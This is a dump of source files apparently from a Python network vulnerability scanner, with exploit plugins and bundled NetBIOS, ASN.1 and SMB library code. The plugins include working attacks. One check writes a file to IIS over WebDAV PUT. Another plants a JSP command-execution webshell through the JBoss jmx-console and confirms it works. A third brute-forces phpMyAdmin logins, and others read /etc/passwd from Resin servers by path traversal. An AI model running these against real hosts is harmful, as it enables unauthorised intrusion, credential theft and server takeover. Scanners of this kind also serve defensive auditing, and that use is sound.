try: 23 | socket.setdefaulttimeout(timeout) 24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | s.connect((ip, port)) 26 | flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:%d\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % 
(ip, port) 27 | s.send(flag) 28 | time.sleep(1) 29 | data = s.recv(1024) 30 | s.close() 31 | if 'PUT' in data: 32 | url = 'http://' + ip + ":" + str(port) + '/vultest.txt' 33 | request = urllib2.Request(url) 34 | res_html = urllib2.urlopen(request, timeout=timeout).read(204800) 35 | if 'xxscan0' in res_html: 36 | return u"iis webdav漏洞" 37 | except Exception, e: 38 | pass 39 | -------------------------------------------------------------------------------- /celerynode/vuldb/iis_webdav_rce.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | import time 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "IIS WebDav RCE", 9 | "info": "CVE-2017-7269,Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <% %>
 <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>
""" 36 | # s1.recv(1024) 37 | shellcode = "" 38 | name = random_str(5) 39 | for v in shell: 40 | shellcode += hex(ord(v)).replace("0x", "%") 41 | flag = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=" + \ 42 | "java.lang.String&arg0=%s.war&argType=java.lang.String&arg1=xunfeng&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" % ( 43 | name) + shellcode + \ 44 | "&argType=boolean&arg4=True HTTP/1.0\r\n\r\n" 45 | s1.send(flag) 46 | data = s1.recv(512) 47 | s1.close() 48 | time.sleep(10) 49 | url = "http://%s:%d" % (host, int(port)) 50 | webshell_url = "%s/%s/xunfeng.jsp" % (url, name) 51 | res = urllib2.urlopen(webshell_url, timeout=timeout) 52 | if 'comments' in res.read(): 53 | info = u"Jboss Authentication bypass webshell:%s" % (webshell_url) 54 | return info 55 | except Exception, e: 56 | pass 57 | -------------------------------------------------------------------------------- /celerynode/vuldb/jboss_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : "信息泄露", 3 | "name" : "Jboss信息泄露", 4 | "level" : "低危", 5 | "type" : "信息泄露", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:jboss", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/status?full=true", 12 | "tag" : "存在信息泄露漏洞", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "Max processing time", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/jenkins_unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Jenkins代码执行", 3 | "info" : "Jenkins未授权访问,攻击者可利用此漏洞执行系统命令", 4 | "level" : "紧急", 5 | "type" : "代码执行", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:jenkins", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/", 12 | "tag" : "Jenkins /Script 代码执行", 13 | 
"analyzing" : "keyword", 14 | "analyzingdata" : "task-link", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/jetty_refer.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Jetty 共享缓存区远程泄露", 8 | "info": "攻击者可利用此漏洞获取其他用户的请求信息,进而获取其权限", 9 | "level": "中危", 10 | "type": "信息泄露", 11 | "author": "wolf@YSRC", 12 | "url": "https://www.secpulse.com/archives/4911.html", 13 | "keyword": "tag:jetty", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 22 | s.settimeout(timeout) 23 | s.connect((ip, int(port))) 24 | flag = "GET / HTTP/1.1\r\nReferer:%s\r\n\r\n" % (chr(0) * 15) 25 | s.send(flag) 26 | data = s.recv(512) 27 | s.close() 28 | if 'state=HEADER_VALUE' in data and '400' in data: 29 | return u"jetty 共享缓存区远程泄露漏洞" 30 | except: 31 | pass 32 | -------------------------------------------------------------------------------- /celerynode/vuldb/memcache_unauth.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Memcache未授权访问", 8 | "info": "导致数据库敏感信息泄露。", 9 | "level": "中危", 10 | "type": "未授权访问", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:memcache", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | s.send("stats\r\n") 25 | result = s.recv(1024) 26 | if "STAT version" in result: 27 | return u"未授权访问" 28 | except Exception, e: 29 | pass 30 | 
-------------------------------------------------------------------------------- /celerynode/vuldb/netgear_passwd.json: -------------------------------------------------------------------------------- 1 | {"info": "NETGEAR\u8def\u7531\u5668\u591a\u4e2a\u7cfb\u5217\u5b58\u5728\u5bc6\u7801\u6cc4\u9732\u6f0f\u6d1e\uff08CVE-2017-5521\uff09", "source": 1, "name": "Netgear\u5bc6\u7801\u6cc4\u9732", "keyword": "banner:NETGEAR", "level": "\u9ad8\u5371", "url": "https://www.seebug.org/vuldb/ssvid-92639", "author": "wolf@YSRC", "type": "\u4fe1\u606f\u6cc4\u9732", "plugin": {"url": "/passwordrecovered.cgi?id=get_rekt", "tag": "\u6f0f\u6d1eURL\uff1a/passwordrecovered.cgi?id=get_rekt", "analyzing": "keyword", "analyzingdata": "class=\"MNUText\" align=\"left\">", "data": "", "method": "GET"}} -------------------------------------------------------------------------------- /celerynode/vuldb/nmb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/celerynode/vuldb/nmb/__init__.py -------------------------------------------------------------------------------- /celerynode/vuldb/nmb/nmb_constants.py: -------------------------------------------------------------------------------- 1 | 2 | # Default port for NetBIOS name service 3 | NETBIOS_NS_PORT = 137 4 | 5 | # Default port for NetBIOS session service 6 | NETBIOS_SESSION_PORT = 139 7 | 8 | # Owner Node Type Constants 9 | NODE_B = 0x00 10 | NODE_P = 0x01 11 | NODE_M = 0x10 12 | NODE_RESERVED = 0x11 13 | 14 | # Name Type Constants 15 | TYPE_UNKNOWN = 0x01 16 | TYPE_WORKSTATION = 0x00 17 | TYPE_CLIENT = 0x03 18 | TYPE_SERVER = 0x20 19 | TYPE_DOMAIN_MASTER = 0x1B 20 | TYPE_MASTER_BROWSER = 0x1D 21 | TYPE_BROWSER = 0x1E 22 | 23 | TYPE_NAMES = { TYPE_UNKNOWN: 'Unknown', 24 | TYPE_WORKSTATION: 'Workstation', 25 | TYPE_CLIENT: 'Client', 26 | TYPE_SERVER: 'Server', 27 | TYPE_MASTER_BROWSER: 'Master 
class NMBSessionMessage:
    """One NetBIOS Session Service packet (RFC 1002 section 4.3.1).

    The 4-byte header is TYPE (1 byte), FLAGS (1 byte) and LENGTH (2 bytes,
    big-endian); bit 0 of FLAGS is the 17th bit of the payload length, so the
    payload may be up to 0x1FFFF bytes long. ``decode`` fills ``type``,
    ``flags`` and ``data`` from a buffer and reports how many bytes it used.
    """

    HEADER_STRUCT_FORMAT = '>BBH'
    HEADER_STRUCT_SIZE = struct.calcsize(HEADER_STRUCT_FORMAT)

    def __init__(self):
        self.reset()

    def reset(self):
        """Return the message to its empty state (type 0, flags 0, no payload)."""
        self.type = 0
        self.flags = 0
        self.data = ''

    def decode(self, data, offset):
        """Decode one message from ``data`` starting at ``offset``.

        :returns: the number of bytes consumed (header plus payload), or 0 when
            ``data`` does not yet hold a complete header or payload. A 0 return
            after a complete header still leaves ``type``/``flags`` populated.
        """
        header_end = offset + self.HEADER_STRUCT_SIZE
        if len(data) < header_end:
            # Header truncated: caller must read more before retrying.
            return 0

        self.reset()
        msg_type, msg_flags, length = struct.unpack(self.HEADER_STRUCT_FORMAT, data[offset:header_end])
        self.type = msg_type
        self.flags = msg_flags

        # FLAGS bit 0 extends the 16-bit length field to 17 bits.
        if msg_flags & 0x01:
            length |= 0x010000

        payload_end = header_end + length
        if len(data) < payload_end:
            # Payload truncated: nothing consumed yet.
            return 0

        self.data = data[header_end:payload_end]
        return payload_end - offset
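def encode_name(name, type, scope = None):
    """Encode a NetBIOS name for the wire (RFC 1001 section 4).

    First-level encoding pads ``name`` to 15 characters, appends the NetBIOS
    ``type`` suffix byte (the wildcard ``'*'`` instead gets 15 NUL bytes and no
    suffix) and spells every byte as two letters in ``'A'..'P'`` (high nibble,
    low nibble). Second-level encoding prefixes the result with its length and
    appends each dot-separated ``scope`` label as a length-prefixed string,
    terminated by a NUL byte.

    :param name: NetBIOS name; longer than 15 characters is silently truncated.
    :param type: name type suffix (0x00..0xFF), e.g. 0x20 for a server.
    :param scope: optional dotted NetBIOS scope ID.
    :returns: the encoded name as a byte string (34 bytes without scope).
    """
    if name == '*':
        # Wildcard query: '*' followed by 15 NUL bytes, no type suffix.
        name = name + '\0' * 15
    elif len(name) > 15:
        name = name[:15] + chr(type)
    else:
        name = name.ljust(15) + chr(type)

    # Encode byte-by-byte instead of re.sub('.', ...): '.' does not match a
    # 0x0A byte, so a name containing a newline was left unencoded and produced
    # a malformed label. string.ascii_uppercase is locale-independent (the
    # old string.uppercase could vary with the C locale).
    letters = string.ascii_uppercase
    encoded_name = chr(len(name) * 2) + ''.join(
        letters[ord(c) >> 4] + letters[ord(c) & 0x0f] for c in name)

    if scope:
        # Each label is <length byte><label>; the whole name ends with a NUL.
        encoded_scope = ''.join(chr(len(label)) + label for label in scope.split('.'))
        return encoded_name + encoded_scope + '\0'
    return encoded_name + '\0'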
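def check(ip, port, timeout):
    """Try a small list of common usernames against a phpMyAdmin login form.

    First locates the login page (site root, then ``/phpmyadmin``), then for
    each candidate user and each password in the shared ``PASSWORD_DIC`` list
    fetches a fresh CSRF token and posts the credentials. A response containing
    one of the post-login frameset markers counts as a successful login.

    :param ip: target host.
    :param port: target port.
    :param timeout: per-request timeout in seconds.
    :returns: ``u'phpmyadmin弱口令,账号:<user> 密码:<password>'`` on the first
        successful login, otherwise ``None`` (no login form found, password
        list exhausted, three network errors, or an unexpected error).

    Note: this sends real credentials over plaintext HTTP and may trigger
    account lockout or IDS alerts on the target; it is an active brute-force.
    """
    # Markers that only appear in the post-login phpMyAdmin UI.
    flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
                 'class="disableAjax" title=']
    user_list = ['root', 'mysql', 'www', 'bbs', 'wwwroot', 'bak', 'backup']
    base = 'http://' + ip + ":" + str(port)

    # Locate the login form. Each candidate location is tried independently so
    # that a 404 or error on the site root does not prevent finding /phpmyadmin.
    # (The original left `url` unbound on an error and only returned None by
    # accident, via a NameError caught further down.)
    url = None
    for path in ("", "/phpmyadmin"):
        try:
            res_html = urllib2.urlopen(base + path, timeout=timeout).read()
        except Exception:
            continue
        if 'input_password' in res_html and 'name="token"' in res_html:
            url = base + path + "/index.php"
            break
    if url is None:
        return

    error_i = 0
    for user in user_list:
        for password in PASSWORD_DIC:
            try:
                # Fresh cookie jar per attempt: phpMyAdmin ties the token to the session.
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
                res_html = opener.open(url, timeout=timeout).read()
                token = re.search('name="token" value="(.*?)" />', res_html)
                if token is None:
                    # Login page layout we do not recognise; stop rather than post blindly.
                    return
                token_hash = urllib2.quote(token.group(1))
                # Percent-encode the credentials: a password containing '&', '=',
                # '+' or '%' would otherwise corrupt the form body and never be
                # tested as typed.
                postdata = "pma_username=%s&pma_password=%s&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci&token=%s" % (
                    urllib2.quote(user, safe=''), urllib2.quote(password, safe=''), token_hash)
                res = opener.open(url, postdata, timeout=timeout)
                res_html = res.read()
                for flag in flag_list:
                    if flag in res_html:
                        return u'phpmyadmin弱口令,账号:%s 密码:%s' % (user, password)
            except urllib2.URLError:
                # Network-level failure (includes HTTP errors, which are a
                # URLError subclass). Give up after three so a dead host does not
                # keep the worker busy for the whole password list.
                error_i += 1
                if error_i >= 3:
                    return
            except Exception:
                # Anything else (unexpected page, encoding problem): stop quietly.
                return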
class BooleanDecoder(decoder.AbstractSimpleDecoder):
    """CER/DER-strict decoder for the ASN.1 BOOLEAN type.

    Installed over the BER decoder's BOOLEAN entry (see the ``tagMap.update``
    below) so that only the two canonical encodings are accepted: 0xFF for
    TRUE and 0x00 for FALSE. A multi-octet payload or any other non-zero value
    is rejected with ``PyAsn1Error`` instead of being coerced to TRUE as BER
    would allow. Accepting non-canonical forms would let several different
    byte strings decode to the same value, which matters wherever the exact
    DER bytes are signed or hashed (certificates, signatures).
    """
    protoComponent = univ.Boolean(0)
    def valueDecoder(self, fullSubstrate, substrate, asn1Spec, tagSet, length,
                     state, decodeFun, substrateFun):
        # Split off exactly `length` octets of payload; the remainder is handed
        # back to the caller as the unconsumed substrate.
        head, tail = substrate[:length], substrate[length:]
        if not head or length != 1:
            raise error.PyAsn1Error('Not single-octet Boolean payload')
        byte = oct2int(head[0])
        # CER/DER specifies encoding of TRUE as 0xFF and FALSE as 0x0, while
        # BER allows any non-zero value as TRUE; cf. sections 8.2.2. and 11.1
        # in http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf
        if byte == 0xff:
            value = 1
        elif byte == 0x00:
            value = 0
        else:
            raise error.PyAsn1Error('Unexpected Boolean payload: %s' % byte)
        return self._createComponent(asn1Spec, tagSet, value), tail
2 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/codec/der/decoder.py: -------------------------------------------------------------------------------- 1 | # DER decoder 2 | from pyasn1.codec.cer import decoder 3 | 4 | tagMap = decoder.tagMap 5 | typeMap = decoder.typeMap 6 | class Decoder(decoder.Decoder): 7 | supportIndefLength = False 8 | 9 | decode = Decoder(tagMap, typeMap) 10 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/codec/der/encoder.py: -------------------------------------------------------------------------------- 1 | # DER encoder 2 | from pyasn1.type import univ 3 | from pyasn1.codec.cer import encoder 4 | from pyasn1 import error 5 | 6 | class SetOfEncoder(encoder.SetOfEncoder): 7 | def _cmpSetComponents(self, c1, c2): 8 | tagSet1 = isinstance(c1, univ.Choice) and \ 9 | c1.getEffectiveTagSet() or c1.getTagSet() 10 | tagSet2 = isinstance(c2, univ.Choice) and \ 11 | c2.getEffectiveTagSet() or c2.getTagSet() 12 | return cmp(tagSet1, tagSet2) 13 | 14 | tagMap = encoder.tagMap.copy() 15 | tagMap.update({ 16 | # Overload CER encoders with BER ones (a bit hackerish XXX) 17 | univ.BitString.tagSet: encoder.encoder.BitStringEncoder(), 18 | univ.OctetString.tagSet: encoder.encoder.OctetStringEncoder(), 19 | # Set & SetOf have same tags 20 | univ.SetOf().tagSet: SetOfEncoder() 21 | }) 22 | 23 | typeMap = encoder.typeMap 24 | 25 | class Encoder(encoder.Encoder): 26 | supportIndefLength = False 27 | def __call__(self, client, defMode=True, maxChunkSize=0): 28 | if not defMode: 29 | raise error.PyAsn1Error('DER forbids indefinite length mode') 30 | return encoder.Encoder.__call__(self, client, defMode, maxChunkSize) 31 | 32 | encode = Encoder(tagMap, typeMap) 33 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/compat/__init__.py: 
-------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 2 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/compat/binary.py: -------------------------------------------------------------------------------- 1 | from sys import version_info 2 | 3 | if version_info[0:2] < (2, 6): 4 | def bin(x): 5 | if x <= 1: 6 | return '0b'+str(x) 7 | else: 8 | return bin(x>>1) + str(x&1) 9 | else: 10 | bin = bin 11 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/compat/octets.py: -------------------------------------------------------------------------------- 1 | from sys import version_info 2 | 3 | if version_info[0] <= 2: 4 | int2oct = chr 5 | ints2octs = lambda s: ''.join([ int2oct(x) for x in s ]) 6 | null = '' 7 | oct2int = ord 8 | octs2ints = lambda s: [ oct2int(x) for x in s ] 9 | str2octs = lambda x: x 10 | octs2str = lambda x: x 11 | isOctetsType = lambda s: isinstance(s, str) 12 | isStringType = lambda s: isinstance(s, (str, unicode)) 13 | else: 14 | ints2octs = bytes 15 | int2oct = lambda x: ints2octs((x,)) 16 | null = ints2octs() 17 | oct2int = lambda x: x 18 | octs2ints = lambda s: [ x for x in s ] 19 | str2octs = lambda x: x.encode() 20 | octs2str = lambda x: x.decode() 21 | isOctetsType = lambda s: isinstance(s, bytes) 22 | isStringType = lambda s: isinstance(s, str) 23 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/error.py: -------------------------------------------------------------------------------- 1 | class PyAsn1Error(Exception): pass 2 | class ValueConstraintError(PyAsn1Error): pass 3 | class SubstrateUnderrunError(PyAsn1Error): pass 4 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/type/__init__.py: 
-------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 2 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/type/char.py: -------------------------------------------------------------------------------- 1 | # ASN.1 "character string" types 2 | from pyasn1.type import univ, tag 3 | 4 | class NumericString(univ.OctetString): 5 | tagSet = univ.OctetString.tagSet.tagImplicitly( 6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18) 7 | ) 8 | 9 | class PrintableString(univ.OctetString): 10 | tagSet = univ.OctetString.tagSet.tagImplicitly( 11 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19) 12 | ) 13 | 14 | class TeletexString(univ.OctetString): 15 | tagSet = univ.OctetString.tagSet.tagImplicitly( 16 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20) 17 | ) 18 | 19 | class T61String(TeletexString): pass 20 | 21 | class VideotexString(univ.OctetString): 22 | tagSet = univ.OctetString.tagSet.tagImplicitly( 23 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21) 24 | ) 25 | 26 | class IA5String(univ.OctetString): 27 | tagSet = univ.OctetString.tagSet.tagImplicitly( 28 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22) 29 | ) 30 | 31 | class GraphicString(univ.OctetString): 32 | tagSet = univ.OctetString.tagSet.tagImplicitly( 33 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25) 34 | ) 35 | 36 | class VisibleString(univ.OctetString): 37 | tagSet = univ.OctetString.tagSet.tagImplicitly( 38 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26) 39 | ) 40 | 41 | class ISO646String(VisibleString): pass 42 | 43 | class GeneralString(univ.OctetString): 44 | tagSet = univ.OctetString.tagSet.tagImplicitly( 45 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27) 46 | ) 47 | 48 | class UniversalString(univ.OctetString): 49 | tagSet = univ.OctetString.tagSet.tagImplicitly( 50 | 
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28) 51 | ) 52 | encoding = "utf-32-be" 53 | 54 | class BMPString(univ.OctetString): 55 | tagSet = univ.OctetString.tagSet.tagImplicitly( 56 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30) 57 | ) 58 | encoding = "utf-16-be" 59 | 60 | class UTF8String(univ.OctetString): 61 | tagSet = univ.OctetString.tagSet.tagImplicitly( 62 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12) 63 | ) 64 | encoding = "utf-8" 65 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/type/error.py: -------------------------------------------------------------------------------- 1 | from pyasn1.error import PyAsn1Error 2 | 3 | class ValueConstraintError(PyAsn1Error): pass 4 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/type/namedval.py: -------------------------------------------------------------------------------- 1 | # ASN.1 named integers 2 | from pyasn1 import error 3 | 4 | __all__ = [ 'NamedValues' ] 5 | 6 | class NamedValues: 7 | def __init__(self, *namedValues): 8 | self.nameToValIdx = {}; self.valToNameIdx = {} 9 | self.namedValues = () 10 | automaticVal = 1 11 | for namedValue in namedValues: 12 | if isinstance(namedValue, tuple): 13 | name, val = namedValue 14 | else: 15 | name = namedValue 16 | val = automaticVal 17 | if name in self.nameToValIdx: 18 | raise error.PyAsn1Error('Duplicate name %s' % (name,)) 19 | self.nameToValIdx[name] = val 20 | if val in self.valToNameIdx: 21 | raise error.PyAsn1Error('Duplicate value %s=%s' % (name, val)) 22 | self.valToNameIdx[val] = name 23 | self.namedValues = self.namedValues + ((name, val),) 24 | automaticVal = automaticVal + 1 25 | 26 | def __repr__(self): 27 | return '%s(%s)' % (self.__class__.__name__, ', '.join([repr(x) for x in self.namedValues])) 28 | 29 | def __str__(self): return str(self.namedValues) 30 | 31 | def __eq__(self, other): return 
tuple(self) == tuple(other) 32 | def __ne__(self, other): return tuple(self) != tuple(other) 33 | def __lt__(self, other): return tuple(self) < tuple(other) 34 | def __le__(self, other): return tuple(self) <= tuple(other) 35 | def __gt__(self, other): return tuple(self) > tuple(other) 36 | def __ge__(self, other): return tuple(self) >= tuple(other) 37 | def __hash__(self): return hash(tuple(self)) 38 | 39 | def getName(self, value): 40 | if value in self.valToNameIdx: 41 | return self.valToNameIdx[value] 42 | 43 | def getValue(self, name): 44 | if name in self.nameToValIdx: 45 | return self.nameToValIdx[name] 46 | 47 | def __getitem__(self, i): return self.namedValues[i] 48 | def __len__(self): return len(self.namedValues) 49 | 50 | def __add__(self, namedValues): 51 | return self.__class__(*self.namedValues + namedValues) 52 | def __radd__(self, namedValues): 53 | return self.__class__(*namedValues + tuple(self)) 54 | 55 | def clone(self, *namedValues): 56 | return self.__class__(*tuple(self) + namedValues) 57 | 58 | # XXX clone/subtype? 
59 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/type/tagmap.py: -------------------------------------------------------------------------------- 1 | from pyasn1 import error 2 | 3 | class TagMap: 4 | def __init__(self, posMap={}, negMap={}, defType=None): 5 | self.__posMap = posMap.copy() 6 | self.__negMap = negMap.copy() 7 | self.__defType = defType 8 | 9 | def __contains__(self, tagSet): 10 | return tagSet in self.__posMap or \ 11 | self.__defType is not None and tagSet not in self.__negMap 12 | 13 | def __getitem__(self, tagSet): 14 | if tagSet in self.__posMap: 15 | return self.__posMap[tagSet] 16 | elif tagSet in self.__negMap: 17 | raise error.PyAsn1Error('Key in negative map') 18 | elif self.__defType is not None: 19 | return self.__defType 20 | else: 21 | raise KeyError() 22 | 23 | def __repr__(self): 24 | s = self.__class__.__name__ + '(' 25 | if self.__posMap: 26 | s = s + 'posMap=%r, ' % (self.__posMap,) 27 | if self.__negMap: 28 | s = s + 'negMap=%r, ' % (self.__negMap,) 29 | if self.__defType is not None: 30 | s = s + 'defType=%r' % (self.__defType,) 31 | return s + ')' 32 | 33 | def __str__(self): 34 | s = self.__class__.__name__ + ':\n' 35 | if self.__posMap: 36 | s = s + 'posMap:\n%s, ' % ',\n '.join([ x.prettyPrintType() for x in self.__posMap.values()]) 37 | if self.__negMap: 38 | s = s + 'negMap:\n%s, ' % ',\n '.join([ x.prettyPrintType() for x in self.__negMap.values()]) 39 | if self.__defType is not None: 40 | s = s + 'defType:\n%s, ' % self.__defType.prettyPrintType() 41 | return s 42 | 43 | def clone(self, parentType, tagMap, uniq=False): 44 | if self.__defType is not None and tagMap.getDef() is not None: 45 | raise error.PyAsn1Error('Duplicate default value at %s' % (self,)) 46 | if tagMap.getDef() is not None: 47 | defType = tagMap.getDef() 48 | else: 49 | defType = self.__defType 50 | 51 | posMap = self.__posMap.copy() 52 | for k in tagMap.getPosMap(): 53 | if uniq and k in 
posMap: 54 | raise error.PyAsn1Error('Duplicate positive key %s' % (k,)) 55 | posMap[k] = parentType 56 | 57 | negMap = self.__negMap.copy() 58 | negMap.update(tagMap.getNegMap()) 59 | 60 | return self.__class__( 61 | posMap, negMap, defType, 62 | ) 63 | 64 | def getPosMap(self): return self.__posMap.copy() 65 | def getNegMap(self): return self.__negMap.copy() 66 | def getDef(self): return self.__defType 67 | -------------------------------------------------------------------------------- /celerynode/vuldb/pyasn1/type/useful.py: -------------------------------------------------------------------------------- 1 | # ASN.1 "useful" types 2 | from pyasn1.type import char, tag 3 | 4 | class ObjectDescriptor(char.GraphicString): 5 | tagSet = char.GraphicString.tagSet.tagImplicitly( 6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 7) 7 | ) 8 | 9 | class GeneralizedTime(char.VisibleString): 10 | tagSet = char.VisibleString.tagSet.tagImplicitly( 11 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 24) 12 | ) 13 | 14 | class UTCTime(char.VisibleString): 15 | tagSet = char.VisibleString.tagSet.tagImplicitly( 16 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 23) 17 | ) 18 | -------------------------------------------------------------------------------- /celerynode/vuldb/resin_fileread.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Resin任意文件读取_4", 3 | "info" : "可通过此漏洞读取服务器上的文件 examples", 4 | "level" : "高危", 5 | "type" : "文件读取", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:resin", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", 12 | "tag" : "存在任意文件读取漏洞 /resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../etc/passwd", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "root:", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } 
-------------------------------------------------------------------------------- /celerynode/vuldb/resin_fileread_1.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : "可通过此漏洞读取服务器上的文件 resource", 3 | "name" : "Resin任意文件读取_1", 4 | "level" : "高危", 5 | "type" : "文件读取", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:resin", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd", 12 | "tag" : "存在任意文件读取漏洞 /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "root:", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/resin_fileread_3.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Resin任意文件读取_3", 3 | "info" : "Resin File Read And Directory Browsing Vul CVE:2007-2440", 4 | "level" : "高危", 5 | "type" : "文件读取", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:resin", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/%20..\\\\web-inf", 12 | "tag" : "存在CVE:2007-2440漏洞", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "

class SMBHandler(urllib2.BaseHandler):
    """urllib2 handler for ``smb://`` URLs backed by pysmb.

    URL form (as parsed below): ``smb://[domain;]user:password@host[:port]/share/path``.
    GET-style requests download ``path`` from ``share`` into a temporary file;
    requests carrying data upload it to that path instead.

    Security notes:
    - Credentials travel in the URL userinfo, so any logging, exception text or
      shell history that records the URL also records the password.
    - The server's NetBIOS name is obtained from an unauthenticated NetBIOS
      query against ``host``; the result is only used as the session target
      name passed to ``SMBConnection`` (what pysmb does with it is outside
      this file).
    - ``USE_NTLM`` is passed as ``use_ntlm_v2``; the module default is True.
    """

    def smb_open(self, req):
        global USE_NTLM, MACHINE_NAME

        host = req.get_host()
        if not host:
            raise urllib2.URLError('SMB error: no host given')
        host, port = splitport(host)
        if port is None:
            port = 139
        else:
            port = int(port)

        # username/password handling
        # Credentials come from the URL userinfo ("user:pass@host"); an optional
        # "domain;" prefix on the user part selects the NTLM domain.
        user, host = splituser(host)
        if user:
            user, passwd = splitpasswd(user)
        else:
            passwd = None
        host = unquote(host)
        user = user or ''

        domain = ''
        if ';' in user:
            domain, user = user.split(';', 1)

        # Empty password (anonymous/guest style) when none was given.
        passwd = passwd or ''
        myname = MACHINE_NAME or self.generateClientMachineName()

        # Resolve the server's NetBIOS machine name; this query is unauthenticated
        # UDP, so the answer is only as trustworthy as the network path.
        n = NetBIOS()
        names = n.queryIPForName(host)
        if names:
            server_name = names[0]
        else:
            raise urllib2.URLError('SMB error: Hostname does not reply back with its machine name')

        # First path component is the share name, the rest is the path inside it.
        path, attrs = splitattr(req.get_selector())
        if path.startswith('/'):
            path = path[1:]
        dirs = path.split('/')
        dirs = map(unquote, dirs)
        service, path = dirs[0], '/'.join(dirs[1:])

        try:
            conn = SMBConnection(user, passwd, myname, server_name, domain=domain, use_ntlm_v2 = USE_NTLM)
            conn.connect(host, port)

            if req.has_data():
                # Upload: the request body is written to the remote path.
                data_fp = req.get_data()
                filelen = conn.storeFile(service, path, data_fp)

